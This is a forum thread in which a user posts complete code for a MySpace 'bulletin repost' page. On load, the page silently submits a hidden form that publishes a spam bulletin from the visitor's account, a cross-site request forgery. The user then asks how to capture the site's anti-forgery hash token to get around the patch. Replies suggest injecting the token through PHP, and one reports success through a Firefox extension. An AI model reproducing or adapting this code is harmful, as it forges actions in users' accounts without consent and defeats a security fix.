Hello and welcome to our community! Is this your first visit?
Register
Enjoy an ad free experience by logging in. Not a member yet? Register.
Results 1 to 3 of 3
  1. #1
    New Coder
    Join Date
    Oct 2007
    Posts
    46
    Thanks
    7
    Thanked 0 Times in 0 Posts

    Grab a hash code

    There's a myspace bulletin repost code, which is this
    Code:
    <script language="javascript" type="text/javascript">
    <!--
    function reDirect()
      {
      document.bulletinForm.submit();
      }
    // -->
    </script>
    </head>
    <body onLoad="reDirect()"><center>
    <form name="bulletinForm" action="http://bulletin.myspace.com/index.cfm?fuseaction=bulletin.edit" method="POST" target="_self">
    <input type="hidden" name="groupID" value="0">
    
    <input type="hidden" name="hashcode" value="MHsGCisGAQQBgjdYA8igbTBrBgorBgEEAYI3WAMBoF0wWwIDAgABAgJmAwICAMAECMDZad0h0zS3BBBjEFtHHZcIPZ22xHDNx80PBDB/bOdbTVXoblD/iQi1aMqvh//wZuk7RhaHgFKCy/h6bH0MSkrfs7r9H1gdk0fA69k=">
    <input type="hidden" name="hash" value="6308J150O169O160O160O153O168O157O162">
    <div style="visibility:hidden;display:none;">
    <input type="hidden" name="subject" value="read me! -.-
    " size="1" maxlength="50">
    
    <textarea name="body" type="hidden" style="width: 0px; height: 0px;"><a href="http://some-site-name.extension/save">Save the world here</a><br><a href="http://some-site-name.extension/">REPOST</a>
    </textarea>
    </div>
    
    
    <input type="submit" value="If It Doesn't Direct You Click Here!."></form></body>
    ^ That code is now patched, the only way you can post a bulletin is if you have a hash code which changes after every post. Is there some way i could grab the hash code and change

    <form name="bulletinForm" action="http://bulletin.myspace.com/index.cfm?fuseaction=bulletin.edit" method="POST" target="_self">

    to

    <form name="bulletinForm" action="http://bulletin.myspace.com/index.cfm?fuseaction=bulletin.edit&Hash=THE_ACCURATE_HASHCODE_HERE" method="POST" target="_self">

  • #2
    Regular Coder GO ILLINI's Avatar
    Join Date
    Jun 2005
    Location
    USA
    Posts
    634
    Thanks
    0
    Thanked 7 Times in 7 Posts
    is the hash code stored in a variable?
    PHP Code:
    <?=$some_hash_code_in_this_variable;?>
    Will echo that variable anywhere on the page, Including in the attributes of tags.
    So pretty much:
    PHP Code:
    <form name="bulletinForm" action="http://bulletin.myspace.com/index.cfm?fuseaction=bulletin.edit&Hash=<?=$some_hash_code_in_this_variable;?>" method="POST" target="_self">
    -Adam
    Why not thank me?

    http://adamsworld.name

  • #3
    New Coder
    Join Date
    Jul 2007
    Posts
    78
    Thanks
    6
    Thanked 2 Times in 2 Posts
    I was able to get this to work using javascript in a firefox extension... that is about the only way to do cross site scripting like this on the client side. You can't do it server side as your server would need to be logged into myspace all the time. And even then the variable hash would be invalid.

    oops my bad... I don't know why this post came up... I just realized how old it was...


  •  

    Posting Permissions

    • You may not post new threads
    • You may not post replies
    • You may not post attachments
    • You may not edit your posts
    •